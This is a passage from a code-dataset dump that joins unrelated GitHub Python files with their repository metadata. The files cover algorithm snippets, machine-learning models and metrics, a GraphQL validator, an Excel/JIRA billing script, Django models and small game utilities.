hp_of_3 = max(hp_of_3, input_ints[i] * hp_of_2, input_ints[i] * lp_of_2)
hp_of_2 = max(hp_of_2, input_ints[i] * high, input_ints[i] * low)
lp_of_2 = min(lp_of_2, input_ints[i] * high, input_ints[i] * low)
high = max(high, input_ints[i])
low = min(low, input_ints[i])
return hp_of_3
if __name__ == '__main__':
testcase = eval(input())
try:
print(highest_product_of_3(testcase))
except ValueError:
print("Not enough numbers in list") | true |
601b9d49def3b0501fc8fce5437eb562c074f139 | Python | raoshashank/Navigation-using-DQN | /other_files/SumTree.py | UTF-8 | 3,258 | 3.328125 | 3 | [] | no_license | '''
This Sum Tree implementation is from Simonini Thomas's Deep RL course: https://github.com/simoninithomas/Deep_reinforcement_learning_Course/blob/master/Dueling%20Double%20DQN%20with%20PER%20and%20fixed-q%20targets/Dueling%20Deep%20Q%20Learning%20with%20Doom%20%28%2B%20double%20DQNs%20and%20Prioritized%20Experience%20Replay%29.ipynb
'''
import numpy as np
class SumTree:
#Binary SumTree: leaves contain priorities and data array contains index to leaves
#index of each leaf in sum tree is index of experience in data
# for tree of size n, the leaf nodes have index n/2, n/2+1,n/2+2....n or, tree[-size:] are leaf nodes
def __init__(self,size):
self.data_pointer = 0
self.size=size #number of leaf nodes
#initialize Tree with zero nodes
self.tree = np.zeros(2*size - 1) # Each node has 2 children, and root node is counted twice
#initialize data array with zeroes
self.data = np.zeros(size, dtype = object) # we are storing pointers to other data. so we can perform operations on this object
def add(self,data,priority):
#add priority score to leaf and experience to data
index = self.data_pointer+self.size-1 #Calculate index for new entry
self.data[self.data_pointer] = data #Insert new entry as to data array
#print(priority)
self.update(index,priority) #update table
self.data_pointer+=1 #update tree pointer
if self.data_pointer>=self.size :
self.data_pointer = 0 # Overwrite if we exhaust array
def update(self,index,priority):
#update leaf priority by percolation and update priority of previous samples
# for ith node, (i-1)//2 is parent, 2i+1 is left child and 2i+2 is right child
delta = priority - self.tree[index]
#print(index)
self.tree[index] = priority
while index!=0:
index = (index-1)//2 #index to parent node
self.tree[index]+=delta # add the change to update values of parent to parent+change
def get_leaf(self,value):
#get priority score, experience tuple and index for leaf given value of leaf
parent = 0
while True:
left_child = 2*parent+1
right_child = left_child+1
if left_child >= len(self.tree):
leaf = parent
break
#Tree data is indexed from left to right
else:
if value<=self.tree[left_child]:
parent = left_child #Follow left sub tree
else:
value-= self.tree[left_child] # get the remainder and follow right sub tree
parent=right_child
#index of data and tree follows the equation tree_pointer = tree_size -1 + array_index
data_index = leaf + 1 - self.size
return self.data[data_index],self.tree[leaf],leaf
def total_priority(self):
#get value of total priority from root node.
#since the tree is a sum tree, the total priority is just the value of the root node
return self.tree[0]
| true |
ceea2367345bf57bbf2860185546a40789b96490 | Python | thegraycoder/rectangles | /main.py | UTF-8 | 473 | 3.828125 | 4 | [] | no_license | from models import Point, Rectangle
if __name__ == '__main__':
# Point p1 and p2 create left to right diagonal of rectangle r1
p1 = Point(0, 4)
p2 = Point(4, 0)
r1 = Rectangle(p1, p2)
# Point p3 and p4 create left to right diagonal of rectangle r2
p3 = Point(1, 3)
p4 = Point(3, 1)
r2 = Rectangle(p3, p4)
if r1.does_intersect(r2):
print("The rectangles intersect!")
else:
print("The rectangles do not intersect!")
| true |
b3110c8ea279ebd09f7fd45c442e47450e2370bd | Python | adaveniprashanth/MyData | /Python_training/INTEL_data/Dumped_from VNC/excel_extract.py | UTF-8 | 6,862 | 2.59375 | 3 | [] | no_license | import pandas as pd
import numpy as np
from openpyxl import load_workbook,Workbook
from openpyxl.styles import PatternFill,Alignment
import sys
from datetime import date
print("you have to install the below packages to run")
print("pandas,numpy,openpyxl and xlrd")
print("pip install pandas\npip install numpy\npip install openpyxl\npip install xlrd")
print("python script and input file should be in same folder")
user_request= int(input("which file you wanna generate?\n 1. consolidate 2. JIRA_submission 3. both\n"))
if user_request == 3 or user_request == 1:
input_filename='WW_40_43_1.xlsx'
result_filename='consollidated_bill.xlsx'
xL = pd.ExcelFile(input_filename)
print("sheets in excel file are\n",xL.sheet_names)
list_of_sheets =xL.sheet_names
print("total no.of sheets are ",len(list_of_sheets))
df = pd.read_excel(input_filename,sheet_name=xL.sheet_names)#accessing sheets by name
jira_sumit_df=pd.DataFrame()
for i in list_of_sheets:
print("sheet name is ",i)
l=len(df[i].iloc[:])
#print("total rows in {0} shett are {1}".format(i,len(df[i].iloc[:,:])))
for j in range(l):
if pd.notna(df[i].loc[j,"Assignee"]) and pd.notna(df[i].loc[j,"Intel Leads Approval"]) and df[i].loc[j,"Intel Leads Approval"].strip().lower() == "approved":
#if pd.notna(df[i].loc[j,"Assignee"]):
print("approved jira is ",df[i].loc[j,"Key"])
d = { "Assignee":df[i].loc[j,"Assignee"],
"Issue Type":df[i].loc[j,"Issue Type"],
"Story Points":df[i].loc[j,"Story Points"],
"Summary":df[i].loc[j,"Summary"],
"Domain":i,
"Key":df[i].loc[j,"Key"],
"Complexity":df[i].loc[j,"Complexity"]
}
ser=pd.Series(d)
jira_sumit_df=jira_sumit_df.append(ser,ignore_index=True)
df1=pd.DataFrame()
consolidated_df = pd.concat([df1,
jira_sumit_df[["Assignee"]],
jira_sumit_df[["Issue Type"]],
jira_sumit_df[["Story Points"]],
jira_sumit_df[["Summary"]],
jira_sumit_df[["Domain"]],
jira_sumit_df[["Key"]],
jira_sumit_df[["Complexity"]]
],axis=1)
consolidated_df.to_excel(result_filename,sheet_name='data_set',index=False)
wb = load_workbook(result_filename)
#ws = wb.get_sheet_by_name("data_set")
ws = wb["data_set"]
#Align the cells to center
for i in range(1,len(consolidated_df.iloc[:])+2):
for j in range(1,len(consolidated_df.iloc[0,:])+1):
ws.cell(row=i,column=j).alignment = Alignment(horizontal='center', vertical='center')
#applying the colour to the column headings
fill_cell = PatternFill(patternType='solid', fgColor='ffff00')
for i in range(1,len(consolidated_df.iloc[0,:])+1):
ws.cell(row=1,column=i).fill =fill_cell
for i in range(2,len(consolidated_df.iloc[:])+2):
ws.cell(row=i, column=6).hyperlink = "https://jira.devtools.intel.com/browse/"+ws.cell(row=i, column=6).value
ws.cell(row=i, column=6).value = ws.cell(row=i, column=6).value
ws.cell(row=i, column=6).style = "Hyperlink"
wb.save(result_filename)
print("total rows in ",result_filename," are ",len(consolidated_df.iloc[:])+1)#1 includes column names
print("output file name is ",result_filename)
if user_request == 3 or user_request == 2:
workweek = int(input("enter the work week"))
work_week=workweek
year=date.today().year
input_filename='WW_40_43_1.xlsx'
result_file='jira_submission.xlsx'
xL = pd.ExcelFile(input_filename)
print("sheets in excel file are\n",xL.sheet_names)
list_of_sheets =xL.sheet_names
print("total no.of sheets are ",len(list_of_sheets))
df = pd.read_excel(input_filename,sheet_name=xL.sheet_names)#accessing sheets by name
df1 = pd.DataFrame()
for i in list_of_sheets:
print("sheet name is ",i)
l=len(df[i].iloc[:])
for j in range(l):
if pd.notna(df[i].loc[j,"Assignee"]) and pd.notna(df[i].loc[j,"Intel Leads Approval"]) and df[i].loc[j,"Intel Leads Approval"].strip().lower() == "approved":
print("approved jira is ",df[i].loc[j,"Key"])
d = { "PONumber":int(3002139874),
"Vendor":"Cerium",
"Team":"E2E - Automation",
"Platform":"RAILS",
"SKU":"NA",
"WW":work_week,
"Year":year,
"JiraID":df[i].loc[j,"Key"],
"BillableHeader":"StoryPointSlab",
"Location":"SRR Bangalore",
"L1Approver":"Kh, Brinda",
"L2Approver":"Jain, Nalina"
}
ser=pd.Series(d)
df1=df1.append(ser,ignore_index=True)
df2=pd.DataFrame()
jira_submission = pd.concat([df2,
df1[["PONumber"]],
df1[["Vendor"]],
df1[["Team"]],
df1[["Platform"]],
df1[["SKU"]],
df1[["WW"]],
df1[["Year"]],
df1[["JiraID"]],
df1[["BillableHeader"]],
df1[["Location"]],
df1[["L1Approver"]],
df1[["L2Approver"]],
],axis=1)
jira_submission.to_excel(result_file,sheet_name='data_set',index=False)
wb = load_workbook(result_file)
ws = wb.get_sheet_by_name("data_set")
print("total rows are {} and total columns are {}".format(len(jira_submission.iloc[:]),len(jira_submission.iloc[0,:])))
#Align the cells to center
for i in range(1,len(jira_submission.iloc[:])+2):
for j in range(1,len(jira_submission.iloc[0,:])+1):
ws.cell(row=i,column=j).alignment = Alignment(horizontal='center', vertical='center')
#applying the colour to the column headings
fill_cell = PatternFill(patternType='solid', fgColor='ffff00')
for i in range(1,len(jira_submission.iloc[0,:])+1):
ws.cell(row=1,column=i).fill =fill_cell
#adding the hyperlink to the cell for JIRA
for i in range(2,len(jira_submission.iloc[:])+2):
ws.cell(row=i, column=8).hyperlink = "https://jira.devtools.intel.com/browse/"+ws.cell(row=i, column=8).value
ws.cell(row=i, column=8).value = ws.cell(row=i, column=8).value
ws.cell(row=i, column=8).style = "Hyperlink"
#save the excel file
wb.save(result_file)
print("total rows in ",result_file," are ",len(jira_submission.iloc[:])+1)#1 includes column names
print("output file is ",result_file)
| true |
e07006f91c412b1d99d3609152e3f0a758e98d9b | Python | hadisamadzad/queraml | /problems/Key Compression/main.py | UTF-8 | 585 | 3.234375 | 3 | [] | no_license | from filereader import read
from filereader import readAndSplitLines
# functions
def encode(text):
words = input.replace('.','').replace(',','').replace('\'', '').replace('-', '').split()
dict = {}
numbers = []
wordCounter = 0
for word in words:
isNewWord = dict.get(word, 'Yes')
if isNewWord == 'Yes':
wordCounter += 1
dict[word] = wordCounter
numbers.append(wordCounter)
else:
numbers.append(dict[word])
return dict, numbers
# input
input = read("input.txt")
print(encode(input)) | true |
f3c5b2deca8e963e01351dfa95d4302011c004f6 | Python | standardgalactic/R-GAP | /models/FCN3.py | UTF-8 | 983 | 2.578125 | 3 | [] | no_license | import torch.nn as nn
from collections import OrderedDict
class FCN3(nn.Module):
def __init__(self):
super(FCN3, self).__init__()
act = nn.LeakyReLU(negative_slope=0.2)
self.body = nn.ModuleList([
nn.Sequential(OrderedDict([
('layer', nn.Linear(784, 1000, bias=False)),
('act', act)
])),
nn.Sequential(OrderedDict([
('layer', nn.Linear(1000, 100, bias=False)),
('act', act)
])),
nn.Sequential(OrderedDict([
('layer', nn.Linear(100, 1, bias=False)),
('act', act)
]))
])
def forward(self, x):
x_shape = []
for layer in self.body:
if isinstance(layer.layer, nn.Linear):
x = x.flatten(1)
x_shape.append(x.shape)
x = layer(x)
return x, x_shape
@staticmethod
def name():
return 'FCN3'
| true |
35a2839727637152390f27f1c176df63b0c5a6c3 | Python | kr-colab/msUtils | /splitMsOutputIntoWindows.py | UTF-8 | 4,620 | 2.671875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
import sys, gzip
msFile,numWins,winFilePrefix = sys.argv[1:]
numWins = int(numWins)
def getSnpWindowAssignments(positions,numWins):
delta = 1.0/numWins
if numWins > 10000:
sys.exit("Let's not get carried away with the number of windows . . .\n")
winStart = 0.0
winEnd = 0+delta
winIndex = 0
snpWinAssignments = []
for i in range(len(positions)):
while not ((positions[i] > winStart or positions[i] == 0) and positions[i] <= winEnd):
winStart = winEnd
winEnd += delta
winIndex += 1
#trying to avoid some floating-point precision weirdness here
if abs(1.0-winEnd) < 1e-9:
winEnd = 1.0
snpWinAssignments.append(winIndex)
return snpWinAssignments
def getWinRange(fileIndex,numWins,delta):
winStart = fileIndex/float(numWins)
winEnd = winStart + delta
if abs(1.0-winEnd) < 1e-9:
winEnd = 1.0
return winStart,winEnd
def getSegSitesForFiles(snpWindowAssignments,positions,numWins,outFileLs):
segsiteCountLs = []
segsitePositions = []
for i in range(len(outFileLs)):
segsiteCountLs.append(0)
segsitePositions.append([])
for i in range(len(snpWindowAssignments)):
fileIndex = snpWindowAssignments[i]
delta = 1.0/numWins
winStart,winEnd = getWinRange(fileIndex,numWins,delta)
windowedPosition = (positions[i]-winStart)/delta
segsitePositions[fileIndex].append(windowedPosition)
segsiteCountLs[fileIndex] += 1
return segsiteCountLs,segsitePositions
def processSimulation(samples,snpWindowAssignments,positions,numWins,outFileLs):
#first output the header information for the simulation
segsiteCountLs,segsitePositionsLs = getSegSitesForFiles(snpWindowAssignments,positions,numWins,outFileLs)
for i in range(len(outFileLs)):
outFileLs[i] += "\n//\nsegsites: %s\n" %(segsiteCountLs[i])
outFileLs[i] += "positions: " + " ".join([str(x) for x in segsitePositionsLs[i]]) + "\n"
for sample in samples:
for i in range(len(sample)):
outFileLs[snpWindowAssignments[i]] += sample[i]
for i in range(len(outFileLs)):
outFileLs[i] += "\n"
if msFile == "stdin":
isFile = False
msStream = sys.stdin
else:
isFile = True
if msFile.endswith(".gz"):
msStream = gzip.open(msFile)
else:
msStream = open(msFile)
header = msStream.readline()
program,numSamples,numSims = header.strip().split()[:3]
numSamples,numSims = int(numSamples),int(numSims)
#initialize list of output files
outFileLs = []
outFileNameLs = []
for i in range(numWins):
outFileNameLs.append("%s_%s.msWin" %(winFilePrefix,i))
outFileLs.append("./windowedMSOutput %s %s\nblah\n" %(numSamples,numSims))
processedSims = 0
#advance to first simulation
line = msStream.readline()
while not line.startswith("//"):
line = msStream.readline()
while line:
if not line.startswith("//"):
sys.exit("Malformed ms-style output file: read '%s' instead of '//'. AAAARRRRGGHHH!!!!!\n" %(line.strip()))
segsitesBlah,segsites = msStream.readline().strip().split()
segsites = int(segsites)
if segsitesBlah != "segsites:":
sys.exit("Malformed ms-style output file. AAAARRRRGGHHH!!!!!\n")
positionsLine = msStream.readline().strip().split()
if not positionsLine[0] == "positions:":
sys.exit("Malformed ms-style output file. AAAARRRRGGHHH!!!!!\n")
positions = [float(x) for x in positionsLine[1:]]
snpWindowAssignments = getSnpWindowAssignments(positions,numWins)
samples = []
for i in range(numSamples):
sampleLine = msStream.readline().strip()
if len(sampleLine) != segsites:
sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples AAAARRRRGGHHH!!!!!\n" %(segsites,len(sampleLine),sampleLine,i,numSamples))
samples.append(sampleLine)
if len(samples) != numSamples:
raise Exception
processSimulation(samples,snpWindowAssignments,positions,numWins,outFileLs)
processedSims += 1
line = msStream.readline()
#advance to the next non-empty line or EOF
while line and line.strip() == "":
line = msStream.readline()
if processedSims != numSims:
sys.exit("Malformed ms-style output file: %s of %s sims processed. AAAARRRRGGHHH!!!!!\n" %(processedSims,numSims))
for i in range(len(outFileLs)):
outFile = open(outFileNameLs[i], "w")
outFile.write(outFileLs[i])
outFile.close()
if isFile:
msStream.close()
| true |
2f563e7cfffcd371dfcfe43f56a70c50a57dcd44 | Python | tartiflette/tartiflette | /tartiflette/language/validators/query/input_object_field_uniqueness.py | UTF-8 | 1,495 | 2.625 | 3 | [
"MIT"
] | permissive | from tartiflette.language.validators.query.rule import (
June2018ReleaseValidationRule,
)
from tartiflette.language.validators.query.utils import find_nodes_by_name
from tartiflette.utils.errors import graphql_error_from_nodes
class InputObjectFieldUniqueness(June2018ReleaseValidationRule):
"""
This validator validates that Field in an input object are Unique
> No field share the same name.
More details @ https://graphql.github.io/graphql-spec/June2018/#sec-Input-Object-Field-Uniqueness
"""
RULE_NAME = "input-object-field-uniqueness"
RULE_LINK = "https://graphql.github.io/graphql-spec/June2018/#sec-Input-Object-Field-Uniqueness"
RULE_NUMBER = "5.6.3"
def validate(self, path, input_fields, **__):
errors = []
already_tested = []
for ifield in input_fields:
if ifield.name.value in already_tested:
continue
with_same_name = find_nodes_by_name(
input_fields, ifield.name.value
)
if len(with_same_name) > 1:
already_tested.append(ifield.name.value)
errors.append(
graphql_error_from_nodes(
message=f"Can't have multiple Input Field named < {ifield.name.value} >.",
path=path,
nodes=with_same_name,
extensions=self._extensions,
)
)
return errors
| true |
26488993607ffd74570b7136a8833ec753a41720 | Python | Kawser-nerd/CLCDSA | /Source Codes/AtCoder/abc033/C/4793930.py | UTF-8 | 107 | 3.296875 | 3 | [] | no_license | s = input()
arr = s.split("+")
cnt = 0
for x in arr:
if "0" not in x:
cnt+=1
print(cnt) | true |
e8a0f9624380e0ea7b74febeb0a873a7c2e3f5bf | Python | cameronkelahan/AstroResearch | /kerasHeatMaps.py | UTF-8 | 3,739 | 2.90625 | 3 | [] | no_license | import numpy as np
from keras.models import load_model
from sklearn import metrics
import matplotlib.pyplot as plt
# Plot heat map for given model; pass title and saveName
def plot(model, title, saveName):
# Create the x and y axis values (0 - 1 stepping by .1)
# xAxis = np.linspace(0, 1, num=11)
# yAxis = np.linspace(0, 1, num=11)
# Create the x and y axis values (0 - 1 stepping by .01)
xAxis = np.linspace(0, 1, num=101)
yAxis = np.linspace(0, 1, num=101)
# The X data set to populate and predict probability
predX = []
for x in xAxis:
for y in yAxis:
predX.append([x, y])
predProb = model.predict_proba(np.array(predX))
predClass = model.predict(np.array(predX))
# # Unused with the NN predict class
# predMaser = predProb[:,1]
# predMaser = predMaser.reshape(11, 11)
predMaser = predProb.reshape(101, 101)
predMaser = predMaser.transpose()
plt.figure(figsize=(6.4, 4.8))
plt.imshow(predMaser, origin='lower', extent=[0,1,0,1])
plt.xticks(np.arange(.2, 1.1, step=0.2)) # Set label locations
cbar = plt.colorbar()
cbar.ax.tick_params(labelsize=16)
cbar.set_label('Predicted Prob of Maser', fontsize=16)
plt.clim(vmin=0, vmax=1)
cbar.set_clim(0,1)
# plt.text(-10, 50, t, family='serif', ha='right', wrap=True)
plt.title(title)
plt.xlabel('L12',fontsize=16)
plt.ylabel('Lx',fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
# Save as a PDF
# plt.savefig(saveName, dpi=400, bbox_inches='tight', pad_inches=0.05)
plt.show()
plt.clf()
plt.close()
############################# HEAT MAP OF NN BASED ON UNWEIGHTED KNN DATASETS##########################################
###################### Load the models which were trained using the data from Unw KNN Dataset 1
model80Acc3Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel3Layer_12_8_1.h5')
model80Acc4Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel4Layer_8_12_4_1.h5')
model80Acc6Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel6LayerEpoch550_10_10_20_50_17_1.h5')
model80Acc10Layer = load_model('./DataSetUnwKNN80+Acc/NeuralNetworkInfo/kerasModel10LayerEpoch550_10_10_20_25_30_50_17_12_8_1.h5')
################ 3 Layer NN Heat Map
plot(model80Acc3Layer, "3-Layer NN Maser Classification Probability Heat Map",
'./DataSetUnwKNN80+Acc/KerasProbHeatMap3Layer.pdf')
################# 4 Layer NN Heat Map
plot(model80Acc4Layer, "4-Layer NN Maser Classification Probability Heat Map",
'./DataSetUnwKNN80+Acc/KerasProbHeatMap4Layer.pdf')
################# 6 Layer NN Heat Map
plot(model80Acc6Layer, "6-Layer NN Maser Classification Probability Heat Map",
'./DataSetUnwKNN80+Acc/KerasProbHeatMap6Layer.pdf')
################# 10 Layer NN Heat Map
plot(model80Acc10Layer, "10-Layer NN Maser Classification Probability Heat Map",
'./DataSetUnwKNN80+Acc/KerasProbHeatMap10Layer.pdf')
############################# HEAT MAP OF NN BASED ON NN DATASETS#######################################################
# These models were trained by swapping out training sets every epoch
model82F1_3LayerV2 = load_model('./NNDataSelectionV2/3LayerModelF182/3LayerNNModel.h5')
model84F1_4LayerV2 = load_model('./NNDataSelectionV2/4LayerModelF184/4LayerNNModel.h5')
################# 3 Layer NN Heat Map V2
plot(model82F1_3LayerV2, "3-Layer NN Maser Classification Probability Heat Map",
'./NNDataSelectionV2/3LayerModelF182/heatMap3Layer.pdf')
################# 4 Layer NN Heat Map V2
plot(model84F1_4LayerV2, "4-Layer NN Maser Classification Probability Heat Map",
'./NNDataSelectionV2/4LayerModelF184/heatMap4Layer.pdf')
| true |
65e5b9f9ee0b127134aceea181db1a7bdae36122 | Python | Branch321/Throwing_Ds | /player.py | UTF-8 | 2,003 | 3.203125 | 3 | [] | no_license | # This module will contain a "player" class that will hold all statuses/attributes
import configparser
import datetime
class player:
"""
# Purpose: This class will hold all the player stats and statuses
# Variables: last_roll - holds the player's last roll
# benny_counter - # of bennies player has
# traits - holds attributes and skills
# wound_count - # of wounds the player has
# fat_count - # of fatigue the player has
# shaken - boolean determines if player is shaken or not
# session_duration - holds the time the player started the ice era assistant
# incap - boolean determines if player is incapacitated
"""
def __init__(self,name_of_character):
#self.last_roll = {}
self.benny_counter = 3
self.traits = {}
self.weapons_dictionary = {}
self.config = configparser.ConfigParser()
self.config.read('characters/' + name_of_character+'.ini')
self.name_of_character = name_of_character
for key in self.config['traits']:
self.traits[key] = self.config['traits'][key]
self.wound_count = int(self.config['wounds']['wounds'])
self.fat_count = int(self.config['fatigue']['fatigue'])
self.shaken = False
self.session_duration = datetime.datetime.now()
self.incap = False
self.name = self.config['name']['name']
for weapon in self.config['weapons']:
self.weapons_dictionary[weapon] = self.config['weapons'][weapon]
#we will use this function for exiting the program and writing all variables back out to player.ini
def time_to_quit(self):
"""
# Purpose:
# Pre:
# Post:
"""
self.config.set("wounds","wounds", str(self.wound_count))
self.config.set("fatigue","fatigue",str(self.fat_count))
#with open("player.ini",'w') as file:
# self.config.write(file)
| true |
38dd257514bc4cf2c403ea1f96ec0ab9b1be1727 | Python | gescobedo/ddpg-hgru4rec | /modules/evaluate.py | UTF-8 | 4,653 | 2.921875 | 3 | [
"MIT"
] | permissive | import torch
from scipy.special.cython_special import logit
def get_recall(indices, targets, batch_wise=False):
""" Calculates the recall score for the given predictions and targets
Args:
indices (Bxk): torch.LongTensor. top-k indices predicted by the model.
targets (B): torch.LongTensor. actual target indices.
batch_wise (Bool)
Returns:
recall (float): the recall score
"""
targets = targets.view(-1, 1).expand_as(indices) # (Bxk)
hits = (targets == indices).nonzero()
if batch_wise:
return ((targets == indices) * 1.0).sum(dim=-1).view(-1, 1)
else:
if len(hits) == 0: return 0
recall = (targets == indices).nonzero().size(0) / targets.size(0)
return recall
def get_mrr(indices, targets, batch_wise=False):
""" Calculates the MRR score for the given predictions and targets
Args:
indices (Bxk): torch.LongTensor. top-k indices predicted by the model.
targets (B): torch.LongTensor. actual target indices.
batch_wise (Bool)
Returns:
mrr (float): the mrr score
"""
targets = targets.view(-1, 1).expand_as(indices)
# ranks of the targets, if it appears in your indices
hits = (targets == indices).nonzero()
if len(hits) == 0:
if batch_wise:
return torch.zeros(targets.shape[0], 1).cuda()
else:
return 0
ranks = hits[:, -1] + 1
ranks = ranks.float()
if batch_wise:
import pdb
# pdb.set_trace()
buffer = torch.zeros(targets.shape[0]).cuda()
if len(hits) > 0:
buffer[hits[:, 0]] = torch.reciprocal(ranks)
buffer = buffer.view(-1, 1)
return buffer
rranks = torch.reciprocal(ranks) # reciprocal ranks
mrr = torch.sum(rranks) / targets.size(0) # / targets.size(0)
return mrr.item()
def evaluate(logits, targets, k=20, batch_wise=False):
""" Evaluates the model using Recall@K, MRR@K scores.
Args:
logits (B,C): torch.LongTensor. The predicted logit for the next items.
targets (B): torch.LongTensor. actual target indices.
Returns:
recall (float): the recall score
mrr (float): the mrr score
"""
_, indices = torch.topk(logits, k, -1)
recall = get_recall(indices, targets, batch_wise)
mrr = get_mrr(indices, targets, batch_wise)
return recall, mrr
def evaluate_with_ranks(logits, targets, k=20, batch_wise=False):
logits_t = logits.t()
ranks = (logits_t > logits_t[targets].diag()).sum(0) + 1
mrr, recall = get_metrics_from_ranks(batch_wise, k, ranks)
return recall, mrr, ranks
def get_metrics_from_ranks(batch_wise, k, ranks):
ranks_ok = (ranks <= k)
if batch_wise:
recall = ranks_ok.float().view(-1, 1)
mrr = (ranks_ok.float() / ranks.float()).view(-1, 1)
else:
recall = ranks_ok.float().mean()
mrr = (ranks_ok.float() / ranks.float()).mean()
return mrr, recall
def evaluate_multiple_with_ranks(logits, targets, eval_cutoffs=[5, 10, 20], batch_wise=False):
logits_t = logits.t()
ranks = (logits_t > logits_t[targets].diag()).sum(0) + 1
recall, mrr = [], []
for k in eval_cutoffs:
mrr_k, recall_k = get_metrics_from_ranks(batch_wise, k, ranks)
recall.append(recall_k)
mrr.append(mrr_k)
return recall, mrr, ranks
def evaluate_multiple(logits, targets, eval_cutoffs=[5, 10, 20], batch_wise=False):
""" Evaluates the model using Recall@K, MRR@K scores.
Args:
logits (B,C): torch.LongTensor. The predicted logit for the next items.
targets (B): torch.LongTensor. actual target indices.
Returns:
recall (float): the recall score
mrr (float): the mrr score
"""
_, indices = torch.topk(logits, max(eval_cutoffs), -1)
recall, mrr = [], []
for k in eval_cutoffs:
indices_k = indices[:, :k]
targets_k = targets
recall_k, mrr_k = get_recall(indices_k, targets_k, batch_wise), get_mrr(indices_k, targets_k, batch_wise)
recall.append(recall_k)
mrr.append(mrr_k)
# print([[str(x.size()) for x in recall], str(targets.size()), str(indices_k.size())])
return recall, mrr
# Test
# torch.random.manual_seed(0)
#B, C, K = 5, 100, 5
#logits = torch.rand(B, C).cuda()
#targets = torch.randint(C, (B,)).cuda()
#print(targets)
# evaluate_with_ranks(logits, targets,K,False)
# evaluate_with_ranks(logits, targets,K,True)
#print(torch.cat(evaluate_multiple_with_ranks(logits, targets,batch_wise=True)[0],-1))
#print(torch.cat(evaluate_multiple(logits, targets,batch_wise=True)[0],-1))
| true |
7189c092484ed1c3c9599ee85ca70db82951dc7b | Python | xingyuyinxin/AI | /Resnet.py | UTF-8 | 2,727 | 2.71875 | 3 | [] | no_license | import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.models import Model
from keras.datasets import cifar10
import numpy as np
import os
from keras.regularizers import l2
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train / 255
x_test = x_test / 255
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
def resnet_block(inputs, num_filters=16,
kernel_size=3, strides=1,
activation='relu'):
x = Conv2D(num_filters, kernel_size=kernel_size, strides=strides, padding='same')(inputs)
x = BatchNormalization()(x)
if (activation):
x = Activation('relu')(x)
return x
def resnet_v1(input_shape):
inputs = Input(shape=input_shape)
# 第一层
x = resnet_block(inputs)
print('layer1,xshape:', x.shape)
# 第2~7层
for i in range(6):
a = resnet_block(inputs=x)
b = resnet_block(inputs=a, activation='None')
x = keras.layers.add([x, b])
x = Activation('relu')(x)
# out:32*32*16
# 第8~13层
for i in range(6):
if i == 0:
a = resnet_block(inputs=x, strides=2, num_filters=32)
else:
a = resnet_block(inputs=x, num_filters=32)
b = resnet_block(inputs=a, activation='None', num_filters=32)
if i == 0:
x = Conv2D(32, kernel_size=3, strides=2, padding='same')(x)
x = keras.layers.add([x, b])
x = Activation('relu')(x)
# out:16*16*32
# 第14~19层
for i in range(6):
if i == 0:
a = resnet_block(inputs=x, strides=2, num_filters=64)
else:
a = resnet_block(inputs=x, num_filters=64)
b = resnet_block(inputs=a, activation='None', num_filters=64)
if i == 0:
x = Conv2D(64, kernel_size=3, strides=2, padding='same')(x)
x = keras.layers.add([x, b]) # 相加操作,要求x、b shape完全一致
x = Activation('relu')(x)
# out:8*8*64
# 第20层
x = AveragePooling2D(pool_size=2)(x)
# out:4*4*64
y = Flatten()(x)
# out:1024
outputs = Dense(10, activation='softmax')(y)
model = Model(inputs=inputs, outputs=outputs)
return model
model = resnet_v1((32, 32, 3))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(),
metrics=['accuracy'])
model.fit(x_train, y_train, batch_size=64, epochs=200, validation_data=(x_test, y_test), verbose=1)
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
| true |
2292b1e8c5080fbb1169f40cd158e8b33d976f2a | Python | mounikamoparthi/DjangoQuotes | /apps/app_quotes/models.py | UTF-8 | 1,901 | 2.578125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from ..app_login.models import User
from django.db import models
# Create your models here.
class QuoteManager(models.Manager):
def addquotes(request,postData,sessiondata):
print postData
results = {'status': True, 'errors': []}
if not postData['Quoted By'] or len(postData['Quoted By'])<3:
print "In quotes "
results['status'] = False
results['errors'].append("Please enter a valid name")
if not postData['message'] or len(postData['message'])<10:
print "In quotes_messages "
results['status'] = False
results['errors'].append("Please enter a valid message")
if results['status']:
user1 = User.objects.get(id = sessiondata['userid'])
Quote1 = Quote.objects.create(quotedby=postData['Quoted By'],
message=postData['message'],userquotes = user1)
print "ddfghjkl"
results['status'] = True
print "Successfully done!!!!!!!!!"
return results
def favquote(request,context):
print context
results = {'status': True, 'errors': []}
Quote2=Quote.objects.get(id=context["quoteid"])
user1=User.objects.get(id=context["userid"])
Quote2.otherquotes.add(user1)
print "join done!!!!!!!!!"
results['status'] = True
return results
class Quote(models.Model):
quotedby = models.CharField(max_length=1000)
message = models.TextField(max_length=1000)
userquotes= models.ForeignKey('app_login.User', related_name="userquotes")
otherquotes = models.ManyToManyField('app_login.User', related_name="otherquotes")
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
objects=QuoteManager() | true |
f303ce5967f09daedb58a6fb85907fdb6bd17b1c | Python | junwanghust/PythonCrashCourse-Exercises | /8/def_8_6.py | UTF-8 | 465 | 4.4375 | 4 | [] | no_license | # 编写一个名为city_country()的函数,它接受城市的名称及其所属的国家。
# 这个函数应返回一个格式类似于下面这样的字符串:"Santiago, Chile"
# 至少使用三个城市-国家对调用这个函数,并打印它返回的值。
def city_country(city, country):
return city + ', ' + country
print(city_country('Qing dao', 'China'))
print(city_country('Shang hai', 'China'))
print(city_country('New york', 'America'))
| true |
4329f32404377bd19629ec25558361899175a577 | Python | NateWeiler/Resources | /Python/Lexicon/Lexicon-2/lexicon/__init__.py | UTF-8 | 924 | 2.890625 | 3 | [] | no_license | def scan(sentence):
north = ('direction', 'north')
south = ('direction', 'south')
east = ('direction', 'east')
west = ('direction', 'west')
go = ('verb', 'go')
